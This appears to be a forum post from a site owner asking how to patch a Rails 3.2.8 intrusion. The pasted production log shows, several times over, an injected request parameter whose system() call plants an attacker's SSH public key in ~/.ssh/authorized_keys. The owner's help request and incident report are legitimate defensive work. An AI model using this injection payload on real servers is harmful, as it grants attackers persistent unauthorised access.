I noticed some unusual activity on my website a couple days ago so I decided to check out the production log. Here is what I found:

Started GET "/" for 74.219.112.36 at 2013-01-11 20:25:05 +0000 Processing by HomeController#logo as */* Parameters: {"exploit"=># <ActionDispatch::Routing::RouteSet::NamedRouteCollection:0xcb7e650 @routes={:"foo; system('cd ~;mkdir .ssh;echo ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAIEAtHtSi4viCaMf/KeG3mxlynWEWRPV /l4+De+BBFg/xI2ybuFenYYn4clbLFugxxr1sDNr0jBgk0iMqrLbVcdc9p DjKuymKEVbsJbOqrnNMXlUtxCefeGT1piY8Z/7tapLsr+GCXokhIcB2FPzq TtOKhnJvzgA4eZSVZsVlxTwyFM= root >> ~/.ssh/authorized_keys')

__END__

"=> #<OpenStruct defaults={:action=>"create", :controller=>"foos"}, required_parts=[], requirements={:action=>"create", :controller=>"foos"}, segment_keys=[:format]>}, @helpers=[:"hash_for_foo; system('cd ~; mkdir .ssh;echo ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAIEAtHtSi4viCaMf/KeG3mxlynWEWRPV /l4+De+BBFg/xI2ybuFenYYn4clbLFugxxr1sDNr0jBgk0iMqrLbVcdc9pDjKuymKEVbs JbOqrnNMXlUtxCefeGT1piY8Z/7tapLsr+GCXokhIcB2FPzqTtOKhnJvzgA4eZSVZsVlx TwyFM= root >> ~/.ssh/authorized_keys')

__END__

_url", :"foo; system('cd ~;mkdir .ssh;echo ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAIEAtHtSi4viCaMf/KeG3mxlynWEWRPV/l4+De+BBFg /xI2ybuFenYYn4clbLFugxxr1sDNr0jBgk0iMqrLbVcdc9pDjKuymKEVbsJbOqrnNMXlUtxCefeG T1piY8Z/7tapLsr+GCXokhIcB2FPzqTtOKhnJvzgA4eZSVZsVlxTwyFM= root >> ~/.ssh/authorized_keys')

__END__

_url", :"hash_for_foo; system('cd ~;mkdir .ssh;echo ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAIEAtHtSi4viCaMf/KeG3mxlynWEWRPV/l4+De+BBFg /xI2ybuFenYYn4clbLFugxxr1sDNr0jBgk0iMqrLbVcdc9pDjKuymKEVbsJbOqrnNMXlUt xCefeGT1piY8Z/7tapLsr+GCXokhIcB2FPzqTtOKhnJvzgA4eZSVZsVlxTwyFM= root >> ~/.ssh/authorized_keys')

__END__

_path", :"foo; system('cd ~;mkdir .ssh; echo ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAIEAtHtSi4viCaMf/KeG3mxlynWEWRPV/l4+De+BBFg /xI2ybuFenYYn4clbLFugxxr1sDNr0jBgk0iMqrLbVcdc9pDjKuymKEVbsJbOqrnNMXlUtxCefeG T1piY8Z/7tapLsr+GCXokhIcB2FPzqTtOKhnJvzgA4eZSVZsVlxTwyFM= root >> ~/.ssh/authorized_keys')

__END__

_path"], @module=#<Module:0xcb7e5c4>>} Rendered landing_users/_form.html.haml (4.7ms) Rendered home/logo.html.haml within layouts/application (7.8ms) Completed 200 OK in 11ms (Views: 10.4ms | ActiveRecord: 0.0ms)

I went on to check if their system calls worked and sure enough in ~/.ssh/authorized_keys I found the same ssh key. So this means they were able to run system calls through my rails app!!!! Thankfully my rails app isn't run under root so they did not get root access. But regardless this terrifies me.

Has anyone encountered this exploit before? If so how did you patch it?

My rails app is on Ubuntu 12.04, using rails version 3.2.8 and ruby version 1.9.3p125. If any other information would help out please let me know!

I found a blog post referring to this exploit but no solutions, just how to perform it.